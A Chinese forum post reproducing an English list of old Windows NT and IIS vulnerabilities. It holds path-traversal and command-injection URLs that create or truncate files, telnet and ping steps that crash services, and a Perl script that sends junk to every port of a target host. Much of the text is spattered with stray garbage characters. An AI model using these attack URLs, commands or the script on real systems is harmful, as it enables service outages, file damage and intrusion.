找回密码
 注册

QQ登录

只需一步,快速开始

NT的漏洞及描述(英文)

[复制链接]
发表于 2011-1-13 17:12:25 | 显示全部楼层 |阅读模式
受影响系统:4.0,iis 1.0) Q1 x+ R6 E* f5 c# S: v# n9 Z
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.# d! P' {2 I" D5 d1 K( X/ j
1 K0 B; \( w9 e% U
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.3 ]6 W; I! y- s9 V

+ n+ m$ r. Y. \5 ^- u% ZBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
3 M6 [: Q1 {% w0 `% s
$ J7 B+ w8 p: ]* s$ m--------------------------------------------------------------------
" i/ a5 Z2 C5 W$ O- C! ~: E& P, y$ D
受影响系统:4.07 f5 B% n. c0 A0 }1 n- i% e
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.7 A" _+ K9 z1 x  B; G
+ B8 G7 e9 L# R
If the file 'target.bat' exists, the file will be truncated.
. T% S* e$ i) M+ n, V, W8 w. M
! b% y6 h8 g/ e% m2 b
9 j9 v+ Z6 X7 z- ]A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
+ z9 b2 W: n! O# Q7 b9 A2 s* |* t6 `& H
----------------------------------------------------------------------
9 m( s8 n0 i' O5 X( u- D$ |& |' {" t5 p# z5 u+ b1 W0 O
受影响系统:3.51,4.07 U/ V( _9 h5 W, L
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.' h5 C7 x( q# G" s' f8 ?  U
5 g$ [9 @6 r4 b. _8 w, ]& p
The following steps;7 l% _% S; L% ?/ k2 F

) P6 R) p9 H+ w% MTelnet to an NT 4.0 system on port 135 " Q4 [$ r5 a( r! q# O6 x
Type about 10 characters followed by a <CR> * d" R5 S; X+ h1 K( w& K
Exit Telnet
$ A: w. Y) O4 {- {$ P+ rresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.8 W  G7 J8 O. [( s; g
, G% U0 A, Q* o& d+ r' u# j0 u5 c
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
# x7 J* Y5 I0 z: H, J
5 r) A7 q& Z" N) g8 {* c; _0 fThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
. x' F; c$ ?+ q/ G9 a1 Q2 w- ~5 v7 C, v
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.7 C) W. V" X) x: V
6 [/ o8 u- d6 b! f. F# i
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):6 ^  S" [: {3 d- M* u. G6 @* I1 a

3 ]" \% ]) j! W# R0 s: g4 z/*begin poke code*/
1 {7 D, e# j8 s/ X: W; P% i: I7 ?$ `' q( n
use Socket;
) E- J: u4 @" x. {use FileHandle;6 e9 ~- @7 O+ {( ~+ |
require "chat2.pl";
- ~- M- \/ x& B" i1 z, |9 d0 {: ?, j) _# [" j- h
$systemname = $ARGV[0] && shift;8 J. t5 _1 Y* e+ R( m- q) u

# }8 z. p6 _) O5 u$verbose = 1; # tell me what you're hitting
6 j7 i) \" A8 q4 K2 t2 O$knownports = 1; # don't hit known problem ports
$ V" Z4 L3 v8 v2 E' R- ^- t+ rfor ($port = $0; $port<65535; $port++) " ^! y+ a' ~% j# _# M
{3 E8 V7 |, F/ O* F
+ L' A' v5 |9 x" d. j9 ~
; w( s, c" H5 D0 Z
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {, n% q1 f! h  O0 w2 z  z! m
next;, E1 K" q# p+ E4 w! N
}+ t1 O! _6 c) a' R" m) v
$fh = chat::open_port($systemname, $port);5 u# u. q2 G0 K9 X( Z) ?
chat::print ($fh,"This is about ten characters or more");! y8 _" O- a$ _& I; O- @8 U
if ($verbose) {. G( z/ i5 y: @, L1 r. y/ y
print "Trying port: $port\n";
8 |% ]4 G3 S" v9 P) G( m} - I5 O2 T$ N8 p$ k% {+ j* ?; d
chat::close($fh);
7 Q0 S9 C! g. z6 r/ Q
$ p. j7 ?3 ^  k$ s  A8 l, }; u+ i}
7 A" z) c6 |# h; v9 F* r- Y# X& v( }6 s: }) @$ U2 y( m
6 F" {+ I  H! A- I4 Z( P2 D
/*end poke code*/
$ v9 A( ]7 V7 \9 G3 x3 F/ a- [
+ K1 b" m- a% r( ^Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername$ ]% t" k& O# Q8 h4 \

! c3 t. t# o  o) U, W--------------------------------------------------------------------------------
# Y& ~9 A& ~4 s& Z7 _
% @0 t7 v9 q4 v" H  |' o受影响系统:4.0
1 R7 Z) n( Y9 q7 V9 x" O) rUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
9 l; K7 [& S! H7 n5 D
8 D' `9 ^; t( r" l% A6 q5 |! HThis attack causes Dr. Watson to display an alert window and to log an error:
: J( t5 p# j' q8 ~1 I. }: w6 {
2 d$ t& V# G3 n, g"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
8 T' \6 U: q/ g0 B/ ]3 o* C
: O  N: j- s3 q  P7 i--------------------------------------------------------------------------------
3 v) j/ t- r: s) p* w9 L
* k0 B8 g4 h& L, c受影响系统:3.51,4.05 K* q, T8 A" e: ^0 _0 J; J
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
/ u8 ?2 ^% ?1 x
8 \  [# b0 Q! P8 pSTOP: 0X0000001E% h) d8 V2 m; |. M5 {
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
- L3 K  Q" t: L: U# G  O  k6 [& X# \, w
-OR-( }3 y- Q; @7 m& K+ R
" f+ x0 J8 Q3 y8 x$ j1 w" A/ u
STOP: 0x0000000A6 Q5 b" h0 T( V7 i7 }) [' i% r
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS; u; K2 C, }* \: S. r* V8 x6 o
% K8 F9 j" e+ D" ~7 X# V
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.) v4 o  X  j; }% U3 j% s

( S) D& _4 A1 |. S7 ~8 l. ]2 p--------------------------------------------------------------------------------
& H" _) ?: P* |% e$ N) h2 P; U/ y4 h
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ' I9 F+ r% \+ a4 U9 M6 P% g6 m
- ]4 d) o, t/ T: X# E* O7 k$ g+ y
--------------------------------------------------------
: L) ^  c: z0 b8 i
" }$ }  l3 y! ^1 OIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-4-30 19:03

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表